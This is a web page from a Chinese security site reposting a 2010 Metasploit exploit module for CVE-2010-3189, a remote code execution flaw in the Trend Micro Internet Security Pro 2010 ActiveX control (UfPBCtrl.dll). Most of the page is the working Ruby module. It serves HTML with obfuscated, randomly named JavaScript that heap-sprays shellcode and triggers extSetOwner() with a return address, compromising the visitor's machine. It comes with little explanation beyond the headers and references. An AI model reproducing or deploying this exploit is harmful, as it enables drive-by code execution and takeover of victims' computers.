首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Executi
来源:http://www.rec-sec.com 作者:Trancer 发布时间:2010-10-01  

##
# trendmicro_extsetowner.rb
#
# Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution exploit for the Metasploit Framework
#
# Exploit successfully tested on the following platforms:
#  - Trend Micro Internet Security Pro 2010 on Internet Explorer 7, Windows XP SP3
#  - Trend Micro Internet Security Pro 2010 on Internet Explorer 7, Windows Vista SP2
#
# UfPBCtrl.dll version tested:
# File Version: 17.50.0.1366
# ClassID: 15DBC3F9-9F0A-472E-8061-043D9CEC52F0
# RegKey Safe for Script: True
# RegKey Safe for Init: True
# KillBitSet: False
#
# References:
#  - CVE-2010-3189
#  - OSVDB 67561
#  - http://www.zerodayinitiative.com/advisories/ZDI-10-165/ - Original advisory by Andrea Micalizzi aka rgod via Zero Day Initiative
#  - http://www.exploit-db.com/exploits/14878/ - MOAUB #03 exploit
#  - http://www.exploit-db.com/trend-micro-internet-security-pro-2010-activex-extsetowner-remote-code-execution/ - MOAUB #03 binary analysis
#  - http://www.rec-sec.com/2010/09/28/trend-micro-internet-security-2010-rce-exploit/ - Metasploit exploit by Trancer, Recognize-Security
#
# Trancer
# http://www.rec-sec.com
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::Remote::HttpServer::HTML

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution',
   'Description'    => %q{
     This module exploits a remote code execution vulnerability in Trend Micro
     Internet Security Pro 2010 ActiveX.
     When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll
     an attacker may be able to execute arbitrary code.
   },
   'License'        => MSF_LICENSE,
   'Author'         => [ 'Trancer <mtrancer[at]gmail.com' ],
   'Version'        => '$Revision:$',
   'References'     =>
    [
     [ 'CVE', '2010-3189' ],
     [ 'OSVDB', '67561'],
     [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-165/' ], # Andrea Micalizzi aka rgod via Zero Day Initiative
     [ 'URL', 'http://www.exploit-db.com/exploits/14878/' ],  # MOAUB #03
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'process',
    },
   'Payload'        =>
    {
     'Space'         => 1024,
     'BadChars'      => "\x00",
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x00C750A1 } ]
    ],
   'DisclosureDate' => 'Aug 25 2010',
   'DefaultTarget'  => 0))
 end

 def autofilter
  false
 end

 def check_dependencies
  use_zlib
 end

 def on_request_uri(cli, request)
  # Re-generate the payload.
  return if ((p = regenerate_payload(cli)) == nil)

  # Encode the shellcode.
  shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
  
  # Setup exploit buffers
  nops      = Rex::Text.to_unescape(make_nops(4))
  ret     = Rex::Text.to_unescape([target.ret].pack('V'))
  blocksize = 0x40000
  fillto    = 500
  
  # ActiveX parameters
  clsid  = "15DBC3F9-9F0A-472E-8061-043D9CEC52F0"

  # Randomize the javascript variable names
  ufpbctrl     = rand_text_alpha(rand(100) + 1)
  j_shellcode  = rand_text_alpha(rand(100) + 1)
  j_nops       = rand_text_alpha(rand(100) + 1)
  j_ret        = rand_text_alpha(rand(100) + 1)
  j_headersize = rand_text_alpha(rand(100) + 1)
  j_slackspace = rand_text_alpha(rand(100) + 1)
  j_fillblock  = rand_text_alpha(rand(100) + 1)
  j_block      = rand_text_alpha(rand(100) + 1)
  j_memory     = rand_text_alpha(rand(100) + 1)
  j_counter    = rand_text_alpha(rand(30) + 2)

  html = %Q|<html>
<object classid='clsid:#{clsid}' id='#{ufpbctrl}'></object>
<script>
var #{j_shellcode} = unescape('#{shellcode}');
var #{j_nops} = unescape('#{nops}');
var #{j_headersize} = 20;
var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace});
var #{j_block} = #{j_nops}.substring(0,#{j_nops}.length - #{j_slackspace});
while (#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
var #{j_memory} = new Array();
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
 #{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode};
}
#{ufpbctrl}.extSetOwner(unescape('#{ret}'));
</script>
</html>|

  print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

  # Transmit the response to the client
  send_response(cli, html, { 'Content-Type' => 'text/html' })

  # Handle the payload
  handler(cli)
 end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft IIS 6.0 ASP Stack Ov
·Evaria Content Management Syst
·Joomla JE Directory Component
·win32/xp sp3 (Tr) About Box Sh
·Joomla JE Job Component SQL in
·win32 9x/NT/2k/XP Generic cmd.
·Microsoft Unicode Scripts Proc
·MP3 Player Utilities 3.57 (AMV
·Quick Player 1.3 Unicode SEH E
·XFS Deleted Inode Local Inform
·iGaming CMS <= 1.5 Blind SQL I
·Webspell wCMS-Clanscript4.01.0
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved